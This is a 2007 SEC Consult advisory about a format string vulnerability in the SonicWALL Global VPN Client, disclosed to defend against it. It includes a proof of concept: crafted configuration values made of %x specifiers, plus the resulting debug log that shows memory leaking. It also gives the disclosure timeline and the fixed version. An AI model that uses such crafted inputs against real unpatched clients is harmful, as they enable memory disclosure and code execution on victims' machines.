SEC Consult Security Advisory < 20071204-0 > ===================================================================================== title: SonicWALL Global VPN Client Format String Vulnerability program: SonicWALL Global VPN Client vulnerable version: < 4.0.0.830 homepage: www.sonicwall.com found: 06-12-2007 by: lofi42* perm. link: http://www.sec-consult.com/305.html ===================================================================================== Vendor description: --------------- The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway. Vulnerabilty overview: --------------- SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability allows an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file. Vulnerability details: --------------- Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "Hostname" Tags in the configuration file. Examples: %s%s%s%s The bugs has been verified in version 3.1.556 and beta 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log. Proof-of-concept: --------------- In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this... AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% x.%x BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% x.%x.%x.%x.%x.%x.%x ...yields the following logfile: ----------------------< Connection name >----------------------------------- OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139. 203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427. 6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' '' --------------------------------------------------------- ------------------------------------------------------------------ BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825. 78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e. 74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242' ------------------------------------------------------------- This vulnerability allows reading / writing to arbitrary memory addresses within the process memory space. Exploitation is trivial under these circumstances. vendor status: --------------- vendor notified: 2007-08-16 vendor response: 2007-08-29 patch available: 2007-11-26 The issue has been fixed in SonicWall VPN client 4.0.0.830. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * The vulnerabilities described above have been purchased by SEC Consult from an independent security researcher. In the research bonus programme, SEC Consult is looking for security vulnerabilities in common software products. For more information, contact research [at] sec-consult [dot] com